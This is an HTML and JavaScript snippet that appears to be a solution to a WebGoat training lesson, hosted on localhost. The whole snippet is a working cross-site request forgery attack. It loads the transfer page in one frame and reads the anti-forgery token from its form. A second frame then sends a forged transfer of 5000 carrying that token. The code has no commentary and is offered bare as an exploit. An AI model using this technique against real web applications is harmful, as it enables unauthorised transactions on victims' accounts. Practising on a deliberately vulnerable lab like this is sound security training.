<script language = 'javascript'>

var tokensuffix;

function readFrame1(){
    var frameDoc = document.getElementById("frame1").contentDocument;
    var form = frameDoc.getElementsByTagName("form")[0];
    tokensuffix = '&token=' + form.token.value;

    loadFrame2();
}

function loadFrame2(){
    var Frame2 = document.getElementById("frame2");
    Frame2.src="http://localhost:25560/WebGoat/attack?Screen=605842438&menu=900&transfer=5000" + tokensuffix;
}
</script>

<iframe src="http://localhost:25560/WebGoat/attack?Screen=605842438&menu=900&transfer=main" onload="readFrame1();" id="frame1" frameborder="1" marginwidth="0" marginheight="0" width="600" scrolling=yes height="300"></iframe>
<iframe id="frame2" frameborder="1" marginwidth="0" marginheight="0" width="600" scrolling="yes" height="300"></iframe>